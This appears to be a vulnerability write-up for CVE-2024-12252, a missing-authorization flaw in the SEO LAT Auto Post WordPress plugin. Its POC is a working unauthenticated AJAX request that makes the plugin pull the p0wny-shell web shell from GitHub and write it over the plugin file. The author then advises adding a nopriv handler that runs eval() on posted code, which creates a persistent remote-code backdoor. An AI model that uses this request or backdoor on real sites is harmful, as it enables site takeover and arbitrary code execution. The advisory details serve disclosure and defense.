# CVE-2024-12252
SEO LAT Auto Post <= 2.2.1 - Missing Authorization to File Overwrite/Upload (Remote Code Execution)

# Description

The SEO LAT Auto Post plugin for WordPress is vulnerable to file overwrite due to a missing capability check on the remote_update AJAX action in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to overwrite the seo-beginner-auto-post.php file which can be leveraged to achieve remote code execution.

## Details

- **Type**: plugin
- **Slug**: seo-beginner-auto-post
- **Affected Version**: 2.2.1
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-12252
- **Status**: Closed

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

action=remote_update&url=https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php
```

This will overwrite `https://wp-dev.ddev.site/wp-content/plugins/seo-beginner-auto-post/seo-beginner-auto-post.php` - I would advise to alter the current plugin and add a nopriv action for a rce. `https://plugins.svn.wordpress.org/seo-beginner-auto-post/trunk/seo-beginner-auto-post.php`

add a function like.

```


// Add the AJAX action
add_action('wp_ajax_nopriv_execute_code', 'execute_code_callback');
add_action('wp_ajax_execute_code', 'execute_code_callback');

// The callback function
function execute_code_callback() {
    // Get the code to execute from the request
    $code = $_POST['code'];

    // Execute the code
    eval($code);

    // Return a success message
    echo 'Code executed successfully!';
    wp_die();
}
```
